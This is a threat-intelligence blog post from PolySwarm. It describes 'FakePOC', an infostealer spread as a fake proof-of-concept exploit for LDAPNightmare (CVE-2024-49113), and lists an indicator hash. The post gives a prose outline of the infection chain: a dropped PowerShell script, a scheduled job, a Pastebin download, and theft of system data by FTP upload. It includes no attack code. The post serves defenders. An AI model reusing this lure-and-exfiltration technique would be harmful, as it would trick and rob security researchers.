Insights, news, education and announcements from PolySwarm

"FakePOC" Infostealer Masquerading as LDAPNightmare PoC Exploit

Written by The Hivemind | Jan 13, 2025 8:00:14 PM

Executive Summary

An infostealer, dubbed “FakePOC”, was recently observed masquerading as an LDAPNightmare proof of concept (PoC) exploit.

Key Takeaways

  • An infostealer was recently observed masquerading as an LDAPNightmare proof of concept (PoC) exploit. 
  • While no official name has been given to this malware family, Trend Micro detects the associated samples as TrojanSpy.Win32.FAKEPOC.THAOGBE and Trojan.PS1.FAKEPOC.THAOHBE. Based on this, PolySwarm analysts have chosen to nickname this infostealer FakePOC.
  • FakePOC steals data from the victim machine then compresses it into a ZIP file and uploads it to an external FTP server.

What is "FakePOC"?

An infostealer was recently observed masquerading as an LDAPNightmare proof of concept (PoC) exploit. While no official name has been given to this malware family, Trend Micro recently reported on this activity and detects the associated samples as TrojanSpy.Win32.FAKEPOC.THAOGBE and Trojan.PS1.FAKEPOC.THAOHBE. Based on this, PolySwarm analysts have chosen to nickname the infostealer FakePOC.

In late December, Microsoft addressed two critical vulnerabilities in Windows Lightweight Directory Access Protocol (LDAP), CVE-2024-49112 and CVE-2024-49113. CVE-2024-49112 is a remote code execution bug that can allow threat actors to use specially crafted LDAP requests to execute arbitrary code on the victim machine. CVE-2024-49113, also known as LDAPNightmare, is a denial of service vulnerability. Threat actors can exploit this vulnerability to crash the LDAP service and create service disruptions.

Threat actors likely took advantage of the fact that security researchers would seek out LDAPNightmare exploit PoCs and used a fake PoC as a lure to deliver a new information stealer family. While these threat actors are not the first to post malware masquerading as a PoC, this highlights the risks posed to security researchers, who may inadvertently download something that is not what it appears to be.

According to Trend Micro researchers, the repository containing the malware is a fork from the original creator, and the original files were replaced with an executable named poc.exe. When the file is executed, a PowerShell script is dropped and executed and creates a scheduled job, which, in turn, executes an encoded script. This script downloads another script hosted on Pastebin.

The newly downloaded script collects the victim machine’s public IP and sends it to the C2. Other information collected by the malware includes computer information, process list, directory lists, network IPs, network adapters, and installed updates. This information is compressed into a ZIP file and uploaded to an external FTP server. 

IOCs

PolySwarm has a sample associated with this activity.

 

6fa92aa4bb222560805392da26e21a4f6cc3ca0f2b89e75cf18a89d93f36505d

 

You can use the following CLI command to search for all "FakePOC" samples in our portal:

$ polyswarm link list -f FakePOC

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 
View full post